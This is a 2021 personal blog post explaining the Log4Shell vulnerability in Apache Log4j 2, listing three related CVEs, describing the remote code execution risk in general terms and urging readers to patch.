Brandon Travis

picture of laptop with warning icon

Log4j vulnerability and what it means

Last updated on: Thursday, December 23, 2021

Log4j has been popular recently for the recent news about the 0-day that affects a large number of servers on the internet. On December 10th, experts in the industry have discovered this serious vulnerability being touted as Log4Shell, funnily enough, was initially used by hackers to have fun on Minecraft servers. Hackers have been exploiting Minecraft servers with this vulnerability at least since December 1st of this year.

What is this Log4Shell Vulnerability?

Log4Shell is the vulnerability in the popular logging package, Apache Log4j 2. This package is a popular logging library used in a lot of well-known Java applications for error message logging and performance monitoring. This vulnerability allows for remote code which can allow arbitrary code execution, which of course is as scary as it sounds. Thankfully, Apache has pushed out a patch fixing this vulnerability CVE-2021-44228, however as great as this sounds left part of vulnerability still unpatched and working. This has resulted in a new report titled CVE-2021-45046. However with both of these patches out, Apache has also pushed out a third patch, CVE-2021-45105, which according to the description of the CVE report,

Apache has given the severity of this vulnerability a CVSS score of 10/10, so if your servers have still not been patched against this vulnerability, which I doubt, you should update to the latest version if possible and as fast as possible.

Risks of Log4Shell

The exploit allows a remote attacker to send a malicious request to a server running a vulnerable version of Log4j. After this malicious request is sent, the payload from the request gets remotely executed on the server allowing for an attacker to start a reverse shell.

The ease that this exploit can be executed is one of the largest factors that is adding to the severity of the exploit. There are no advanced skills needed and a person with almost no skill is able to take a malicious string from anywhere on the internet.

Current Vulnerability List of Log4J

VulnerabilityDescription
CVE-2021-45105This causes an uncontrolled recursion event and in return triggers an eventual denial-of-service attack
CVE-2021-45046Allows an attacker to execute remote code on exploitable servers
CVE-2021-44228Allows an attacker to execute remote code on exploitable servers using the basic message lookup function of Log4j

To ensure that you are protected against Log4j make sure you update the software and libraries that you or your company uses. Don't be that one company that ends up on the news for not patching the software from a well-known vulnerability until it is too late.


Related Posts

Linux mascot penguin
Linux Servers and Security
Picture of WordPress logo
How secure is WordPress really?
A picture that shows security issues
WordPress All in One SEO Plugin Vulnerability

Copyright © Brandon-travis.com 2022.